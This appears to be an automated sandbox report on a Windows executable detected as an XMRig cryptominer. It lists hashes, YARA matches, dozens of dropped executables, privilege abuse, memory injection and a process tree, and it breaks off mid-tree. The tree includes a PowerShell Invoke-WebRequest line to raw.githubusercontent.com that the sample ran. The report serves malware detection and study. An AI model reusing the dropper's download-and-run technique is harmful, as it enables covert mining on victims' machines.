xmrig | 7f2fb17945547c1f9245b8d09cf3c793985917c9ddbf7d82ca09e777de653a0e

Analysis

max time kernel
120s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
16/05/2024, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
Size

1.5MB
MD5

4854884cfc5fc506b7421cbafea43940
SHA1

51b0d38fd3e421bc2357cb679e6bda698944011d
SHA256

7f2fb17945547c1f9245b8d09cf3c793985917c9ddbf7d82ca09e777de653a0e
SHA512

a162a6d1bf633ff3c3a08b5caaa2c3c9d3eecb099a1b60c4c2342f4c213f45281566a48f763ff023d0f3c4466df5e06e26ad307c38c6b73888c13331f755b305
SSDEEP

24576:zv3/fTLF671TilQFG4P5PmK/lzapbxikE5EkJyQfedz4Gc41aYlKbsZxsEL:Lz071uv4BPm6lg6EW7EzxsEL

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/4500-45-0x00007FF6DB530000-0x00007FF6DB922000-memory.dmp	xmrig
behavioral2/memory/3228-110-0x00007FF6E2D40000-0x00007FF6E3132000-memory.dmp	xmrig
behavioral2/memory/5064-133-0x00007FF7B8760000-0x00007FF7B8B52000-memory.dmp	xmrig
behavioral2/memory/2280-145-0x00007FF72E4C0000-0x00007FF72E8B2000-memory.dmp	xmrig
behavioral2/memory/4660-193-0x00007FF6D68A0000-0x00007FF6D6C92000-memory.dmp	xmrig
behavioral2/memory/2992-203-0x00007FF678720000-0x00007FF678B12000-memory.dmp	xmrig
behavioral2/memory/4516-214-0x00007FF605D30000-0x00007FF606122000-memory.dmp	xmrig
behavioral2/memory/964-210-0x00007FF7E2070000-0x00007FF7E2462000-memory.dmp	xmrig
behavioral2/memory/208-199-0x00007FF7264C0000-0x00007FF7268B2000-memory.dmp	xmrig
behavioral2/memory/1992-187-0x00007FF65A860000-0x00007FF65AC52000-memory.dmp	xmrig
behavioral2/memory/4024-181-0x00007FF734030000-0x00007FF734422000-memory.dmp	xmrig
behavioral2/memory/4792-175-0x00007FF7B0E00000-0x00007FF7B11F2000-memory.dmp	xmrig
behavioral2/memory/1264-169-0x00007FF6279E0000-0x00007FF627DD2000-memory.dmp	xmrig
behavioral2/memory/1244-163-0x00007FF7313B0000-0x00007FF7317A2000-memory.dmp	xmrig
behavioral2/memory/1044-157-0x00007FF656500000-0x00007FF6568F2000-memory.dmp	xmrig
behavioral2/memory/4820-151-0x00007FF70D050000-0x00007FF70D442000-memory.dmp	xmrig
behavioral2/memory/2864-122-0x00007FF714AC0000-0x00007FF714EB2000-memory.dmp	xmrig
behavioral2/memory/2068-116-0x00007FF79B600000-0x00007FF79B9F2000-memory.dmp	xmrig
behavioral2/memory/776-106-0x00007FF662120000-0x00007FF662512000-memory.dmp	xmrig
behavioral2/memory/4124-102-0x00007FF69B880000-0x00007FF69BC72000-memory.dmp	xmrig
behavioral2/memory/3824-95-0x00007FF79BBC0000-0x00007FF79BFB2000-memory.dmp	xmrig
behavioral2/memory/3552-2620-0x00007FF7E5E50000-0x00007FF7E6242000-memory.dmp	xmrig
behavioral2/memory/4524-2621-0x00007FF63C100000-0x00007FF63C4F2000-memory.dmp	xmrig
behavioral2/memory/3400-2638-0x00007FF690190000-0x00007FF690582000-memory.dmp	xmrig
behavioral2/memory/3552-2642-0x00007FF7E5E50000-0x00007FF7E6242000-memory.dmp	xmrig
behavioral2/memory/4500-2654-0x00007FF6DB530000-0x00007FF6DB922000-memory.dmp	xmrig
behavioral2/memory/4820-2667-0x00007FF70D050000-0x00007FF70D442000-memory.dmp	xmrig
behavioral2/memory/1044-2674-0x00007FF656500000-0x00007FF6568F2000-memory.dmp	xmrig
behavioral2/memory/776-2675-0x00007FF662120000-0x00007FF662512000-memory.dmp	xmrig
behavioral2/memory/3228-2677-0x00007FF6E2D40000-0x00007FF6E3132000-memory.dmp	xmrig
behavioral2/memory/1244-2672-0x00007FF7313B0000-0x00007FF7317A2000-memory.dmp	xmrig
behavioral2/memory/4124-2669-0x00007FF69B880000-0x00007FF69BC72000-memory.dmp	xmrig
behavioral2/memory/3824-2666-0x00007FF79BBC0000-0x00007FF79BFB2000-memory.dmp	xmrig
behavioral2/memory/2280-2655-0x00007FF72E4C0000-0x00007FF72E8B2000-memory.dmp	xmrig
behavioral2/memory/3400-2647-0x00007FF690190000-0x00007FF690582000-memory.dmp	xmrig
behavioral2/memory/5064-2690-0x00007FF7B8760000-0x00007FF7B8B52000-memory.dmp	xmrig
behavioral2/memory/4524-2717-0x00007FF63C100000-0x00007FF63C4F2000-memory.dmp	xmrig
behavioral2/memory/2068-2714-0x00007FF79B600000-0x00007FF79B9F2000-memory.dmp	xmrig
behavioral2/memory/2992-2712-0x00007FF678720000-0x00007FF678B12000-memory.dmp	xmrig
behavioral2/memory/1992-2708-0x00007FF65A860000-0x00007FF65AC52000-memory.dmp	xmrig
behavioral2/memory/4660-2706-0x00007FF6D68A0000-0x00007FF6D6C92000-memory.dmp	xmrig
behavioral2/memory/4792-2704-0x00007FF7B0E00000-0x00007FF7B11F2000-memory.dmp	xmrig
behavioral2/memory/4024-2702-0x00007FF734030000-0x00007FF734422000-memory.dmp	xmrig
behavioral2/memory/4516-2698-0x00007FF605D30000-0x00007FF606122000-memory.dmp	xmrig
behavioral2/memory/2864-2689-0x00007FF714AC0000-0x00007FF714EB2000-memory.dmp	xmrig
behavioral2/memory/1264-2716-0x00007FF6279E0000-0x00007FF627DD2000-memory.dmp	xmrig
behavioral2/memory/208-2710-0x00007FF7264C0000-0x00007FF7268B2000-memory.dmp	xmrig
behavioral2/memory/964-2700-0x00007FF7E2070000-0x00007FF7E2462000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	348	powershell.exe
11	348	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
348	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3552	jxpoByZ.exe
2280	sSOHEwG.exe
3400	jJqGYtL.exe
4500	mhjkidt.exe
4820	njkJnyB.exe
3824	PHZQxSb.exe
1044	dmPfVkf.exe
4124	SAcVghs.exe
776	hcIRyNL.exe
1244	BVWxRaz.exe
3228	SHNBTMq.exe
2068	cPDkVLl.exe
1264	zoonaiN.exe
2864	OeOzJJf.exe
4792	nulWiiB.exe
5064	gaPOiUH.exe
4024	WYqogHj.exe
1992	yMIDEss.exe
4660	FqMjWhj.exe
208	geKRzvL.exe
4524	YaLNKhH.exe
2992	xubFcQB.exe
964	xEcXAbF.exe
4516	bcIhukF.exe
1484	AxzsdUn.exe
4544	rhDwvbK.exe
2344	fzvIbwJ.exe
1396	KqsgGgH.exe
1388	FJsnADK.exe
4468	doqDbGS.exe
5068	ZkyxYtt.exe
1744	WZoBxbJ.exe
3288	MFRMNBK.exe
4860	gKUDDlt.exe
4512	sqmcTdC.exe
1160	BYFIXUS.exe
1316	ddUIacc.exe
1392	mPRUZCf.exe
3940	GVpCHxP.exe
1736	EiPsuEq.exe
4624	bNUAGtL.exe
1404	wzgouto.exe
4948	ugbIIdc.exe
4688	KukIBXE.exe
3280	UaJaHEJ.exe
5116	wcpCOTl.exe
4796	DMcCblP.exe
1916	zsKcrAL.exe
1664	IlwDbIq.exe
5024	ijXLQzl.exe
1204	BmXXPaG.exe
4620	ebqJhhr.exe
468	qxjBQSW.exe
2324	FGcUsOb.exe
3372	tMSpLXd.exe
2516	Wbgllkz.exe
4596	XeKsPRg.exe
4236	VYWWRhl.exe
4368	PFEcOqB.exe
2708	twYZTRF.exe
4404	TstgfCG.exe
4788	hFvdBmP.exe
3776	erEwVnA.exe
4232	uJkUBnr.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3316-0-0x00007FF76E9D0000-0x00007FF76EDC2000-memory.dmp	upx
behavioral2/files/0x0007000000023404-6.dat	upx
behavioral2/memory/3552-16-0x00007FF7E5E50000-0x00007FF7E6242000-memory.dmp	upx
behavioral2/memory/3400-29-0x00007FF690190000-0x00007FF690582000-memory.dmp	upx
behavioral2/files/0x0007000000023406-42.dat	upx
behavioral2/memory/4500-45-0x00007FF6DB530000-0x00007FF6DB922000-memory.dmp	upx
behavioral2/files/0x000700000002340a-51.dat	upx
behavioral2/files/0x000700000002340d-62.dat	upx
behavioral2/memory/3228-110-0x00007FF6E2D40000-0x00007FF6E3132000-memory.dmp	upx
behavioral2/files/0x0008000000023412-117.dat	upx
behavioral2/memory/5064-133-0x00007FF7B8760000-0x00007FF7B8B52000-memory.dmp	upx
behavioral2/memory/2280-145-0x00007FF72E4C0000-0x00007FF72E8B2000-memory.dmp	upx
behavioral2/files/0x0007000000023419-158.dat	upx
behavioral2/files/0x000700000002341d-172.dat	upx
behavioral2/memory/4660-193-0x00007FF6D68A0000-0x00007FF6D6C92000-memory.dmp	upx
behavioral2/memory/2992-203-0x00007FF678720000-0x00007FF678B12000-memory.dmp	upx
behavioral2/memory/4516-214-0x00007FF605D30000-0x00007FF606122000-memory.dmp	upx
behavioral2/memory/964-210-0x00007FF7E2070000-0x00007FF7E2462000-memory.dmp	upx
behavioral2/memory/208-199-0x00007FF7264C0000-0x00007FF7268B2000-memory.dmp	upx
behavioral2/files/0x0007000000023421-196.dat	upx
behavioral2/files/0x000700000002341f-194.dat	upx
behavioral2/files/0x0007000000023420-190.dat	upx
behavioral2/files/0x000700000002341e-188.dat	upx
behavioral2/memory/1992-187-0x00007FF65A860000-0x00007FF65AC52000-memory.dmp	upx
behavioral2/memory/4024-181-0x00007FF734030000-0x00007FF734422000-memory.dmp	upx
behavioral2/files/0x000700000002341c-176.dat	upx
behavioral2/memory/4792-175-0x00007FF7B0E00000-0x00007FF7B11F2000-memory.dmp	upx
behavioral2/files/0x000700000002341b-170.dat	upx
behavioral2/memory/1264-169-0x00007FF6279E0000-0x00007FF627DD2000-memory.dmp	upx
behavioral2/files/0x000700000002341a-164.dat	upx
behavioral2/memory/1244-163-0x00007FF7313B0000-0x00007FF7317A2000-memory.dmp	upx
behavioral2/memory/1044-157-0x00007FF656500000-0x00007FF6568F2000-memory.dmp	upx
behavioral2/files/0x0007000000023418-152.dat	upx
behavioral2/memory/4820-151-0x00007FF70D050000-0x00007FF70D442000-memory.dmp	upx
behavioral2/files/0x0007000000023417-146.dat	upx
behavioral2/files/0x0007000000023416-140.dat	upx
behavioral2/memory/4524-139-0x00007FF63C100000-0x00007FF63C4F2000-memory.dmp	upx
behavioral2/files/0x0007000000023415-134.dat	upx
behavioral2/files/0x0008000000023411-128.dat	upx
behavioral2/files/0x0007000000023414-123.dat	upx
behavioral2/memory/2864-122-0x00007FF714AC0000-0x00007FF714EB2000-memory.dmp	upx
behavioral2/memory/2068-116-0x00007FF79B600000-0x00007FF79B9F2000-memory.dmp	upx
behavioral2/files/0x0007000000023413-111.dat	upx
behavioral2/memory/776-106-0x00007FF662120000-0x00007FF662512000-memory.dmp	upx
behavioral2/memory/4124-102-0x00007FF69B880000-0x00007FF69BC72000-memory.dmp	upx
behavioral2/files/0x00090000000233fc-98.dat	upx
behavioral2/files/0x0007000000023410-96.dat	upx
behavioral2/memory/3824-95-0x00007FF79BBC0000-0x00007FF79BFB2000-memory.dmp	upx
behavioral2/files/0x000700000002340e-91.dat	upx
behavioral2/files/0x000700000002340f-89.dat	upx
behavioral2/files/0x000700000002340c-66.dat	upx
behavioral2/files/0x000700000002340b-59.dat	upx
behavioral2/files/0x0007000000023408-54.dat	upx
behavioral2/files/0x0007000000023409-53.dat	upx
behavioral2/files/0x0007000000023407-39.dat	upx
behavioral2/files/0x0007000000023405-30.dat	upx
behavioral2/files/0x0007000000023403-25.dat	upx
behavioral2/files/0x00090000000233f4-15.dat	upx
behavioral2/memory/3552-2620-0x00007FF7E5E50000-0x00007FF7E6242000-memory.dmp	upx
behavioral2/memory/4524-2621-0x00007FF63C100000-0x00007FF63C4F2000-memory.dmp	upx
behavioral2/memory/3400-2638-0x00007FF690190000-0x00007FF690582000-memory.dmp	upx
behavioral2/memory/3552-2642-0x00007FF7E5E50000-0x00007FF7E6242000-memory.dmp	upx
behavioral2/memory/4500-2654-0x00007FF6DB530000-0x00007FF6DB922000-memory.dmp	upx
behavioral2/memory/4820-2667-0x00007FF70D050000-0x00007FF70D442000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\fUaODHM.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\HzBBygI.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\OiAwTxc.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\CmLmlCl.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\GJXTPvz.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\yEpxQym.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\rzFgHyd.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\wUccvbJ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\jnaTwGN.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\UWvwfQn.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\opeMGRh.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\NrmciOR.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\WEkdUTZ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\JfkGMYY.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\rFUnhjk.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\WNdUnmI.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\MhzmAGQ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\MPuAEZo.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\fZlfcEr.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\qVNSQSt.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\MpfJMpw.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\lVuPrnL.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\scErUOf.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\lClYVOV.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\SIYQOTz.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\oXYHqwD.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\EJkqhrn.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\VxhWuid.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\HMVkInq.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\QmfchFy.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\lpvUZpZ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\EjPwAHU.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\eBBfdOq.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\zsIXnpB.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\mJbKxEE.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\XVAnSGl.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\YjmCHNt.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\KwVXNYL.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\gPXGxJq.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\OnaWMIo.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\qIESzSJ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\vvQLCsI.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\IZforfX.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\brKMzPn.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\OzXEhse.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\kGRnLYC.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\lCsDGlM.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\mFadraF.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\pBaineV.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\tezQeZJ.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\jroWClm.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\nstfZba.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\XSBHYhf.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\wDmcdwc.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\udJOfdS.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\FULJnaw.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\sDGiHni.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\avxiiVP.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\NWBEFRl.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\XQzKoCe.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\VlTUzJD.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\xVwxgXI.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\surKWhS.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
File created	C:\Windows\System\MJtrjnY.exe	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
348	powershell.exe
348	powershell.exe
348	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeLockMemoryPrivilege	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3316 wrote to memory of 348	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	84
PID 3316 wrote to memory of 348	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	84
PID 3316 wrote to memory of 3552	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	85
PID 3316 wrote to memory of 3552	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	85
PID 3316 wrote to memory of 3400	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	86
PID 3316 wrote to memory of 3400	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	86
PID 3316 wrote to memory of 2280	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	87
PID 3316 wrote to memory of 2280	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	87
PID 3316 wrote to memory of 4500	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	88
PID 3316 wrote to memory of 4500	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	88
PID 3316 wrote to memory of 4820	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	89
PID 3316 wrote to memory of 4820	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	89
PID 3316 wrote to memory of 3824	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	90
PID 3316 wrote to memory of 3824	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	90
PID 3316 wrote to memory of 1044	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	91
PID 3316 wrote to memory of 1044	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	91
PID 3316 wrote to memory of 1244	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	92
PID 3316 wrote to memory of 1244	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	92
PID 3316 wrote to memory of 4124	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	93
PID 3316 wrote to memory of 4124	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	93
PID 3316 wrote to memory of 776	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	94
PID 3316 wrote to memory of 776	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	94
PID 3316 wrote to memory of 3228	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	95
PID 3316 wrote to memory of 3228	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	95
PID 3316 wrote to memory of 2068	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	96
PID 3316 wrote to memory of 2068	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	96
PID 3316 wrote to memory of 2864	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	97
PID 3316 wrote to memory of 2864	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	97
PID 3316 wrote to memory of 1264	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	98
PID 3316 wrote to memory of 1264	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	98
PID 3316 wrote to memory of 5064	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	99
PID 3316 wrote to memory of 5064	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	99
PID 3316 wrote to memory of 4792	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	100
PID 3316 wrote to memory of 4792	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	100
PID 3316 wrote to memory of 4024	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	101
PID 3316 wrote to memory of 4024	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	101
PID 3316 wrote to memory of 1992	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	102
PID 3316 wrote to memory of 1992	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	102
PID 3316 wrote to memory of 4660	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	103
PID 3316 wrote to memory of 4660	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	103
PID 3316 wrote to memory of 208	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	104
PID 3316 wrote to memory of 208	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	104
PID 3316 wrote to memory of 4524	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	105
PID 3316 wrote to memory of 4524	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	105
PID 3316 wrote to memory of 2992	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	106
PID 3316 wrote to memory of 2992	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	106
PID 3316 wrote to memory of 964	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	107
PID 3316 wrote to memory of 964	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	107
PID 3316 wrote to memory of 4516	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	108
PID 3316 wrote to memory of 4516	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	108
PID 3316 wrote to memory of 1484	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	109
PID 3316 wrote to memory of 1484	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	109
PID 3316 wrote to memory of 4544	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	110
PID 3316 wrote to memory of 4544	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	110
PID 3316 wrote to memory of 2344	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	111
PID 3316 wrote to memory of 2344	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	111
PID 3316 wrote to memory of 1396	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	112
PID 3316 wrote to memory of 1396	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	112
PID 3316 wrote to memory of 1388	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	113
PID 3316 wrote to memory of 1388	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	113
PID 3316 wrote to memory of 4468	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	114
PID 3316 wrote to memory of 4468	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	114
PID 3316 wrote to memory of 5068	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	115
PID 3316 wrote to memory of 5068	3316	4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\4854884cfc5fc506b7421cbafea43940_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:348
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "348" "2956" "2888" "2960" "0" "0" "2964" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:13276
- C:\Windows\System\jxpoByZ.exe
  C:\Windows\System\jxpoByZ.exe
  2⤵
  - Executes dropped EXE
  PID:3552
- C:\Windows\System\jJqGYtL.exe
  C:\Windows\System\jJqGYtL.exe
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\Windows\System\sSOHEwG.exe
  C:\Windows\System\sSOHEwG.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Windows\System\mhjkidt.exe
  C:\Windows\System\mhjkidt.exe
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Windows\System\njkJnyB.exe
